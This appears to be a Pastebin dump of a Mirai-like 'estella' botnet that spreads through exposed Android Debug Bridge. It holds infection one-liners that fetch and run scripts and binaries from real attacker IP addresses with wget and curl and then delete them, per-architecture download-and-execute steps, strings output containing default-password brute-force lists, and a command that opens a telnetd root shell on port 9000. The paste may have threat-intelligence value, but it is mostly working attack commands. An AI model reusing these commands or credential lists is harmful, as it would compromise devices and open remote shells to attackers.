Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
- shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
- shell:cd /data/local/tmp/; busybox wget http://185.61.138.13:8080/ adb; rm adb; wget http://185.61.138.13:8080/adb2 -O -> adb2; sh adb2; rm adb2; busybox curl http://185.61.138.13: sh adb3; rm adb3; curl http://185.61.138.13:8080/adb4 > adb4; sh adb4; rm adb4
- ===================================================================================================================================================
- $ curl "http://185.244.25.198/curl"
- cd /data/local/tmp
- rm -rf estella.*
- curl http://185.244.25.198/bins/estella.x86 > estella.x86
- chmod 777 estella.x86
- ./estella.x86 x86
- curl http://185.244.25.198/bins/estella.arm7 > estella.arm7
- chmod 777 estella.arm7
- ./estella.arm7 arm7
- rm -rf estella.*
- $ curl http://185.244.25.198/bins/estella.x86 > estella.x86
- 9074ef6baa836eb0fabec0a59c46d729 https://www.virustotal.com/#/file/66fe8f2c12b40e647120dad38af15130d3004f5568f6163917400cf3b5d64c29/detection
- $ strings estella.x86
- ...
- ...
- 8.8.8.8
- host::estella
- password:
- pass word:
- username:
- user name:
- admin
- admin$
- invalid
- not valid
- /bin/busybox ESTELLA;
- exit;
- ldvr %s
- quit
- shell
- SCON
- PLSDIE
- STOP
- /bin/busybox
- fo39idkSx
- 185.244.25.198
- : applet not found
- CNXN
- OKAY
- CNXN
- host::estella
- OPEN
- shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
- password:
- pass word:
- username:
- user name:
- not valid
- admin$
- admin
- I0TO5Wv9
- tlJwpbo6
- 6QNMIQGe
- 123456
- 12345
- aa888888
- 1234
- 888888
- 0000
- 1111
- 666666
- 654321
- 111111
- peak0429
- cd /var/tmp; echo -e "/bin/busybox telnetd -p9000 -l/bin/sh; /bin/busybox ESTELLA" > telneton; sh telneton;
- shell:cd /data/local/tmp; busybox wget http://185.244.25.198/wget -O -> wget; sh wget; curl http://185.244.25.198/curl > curl; sh curl; rm -rf curl wget
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement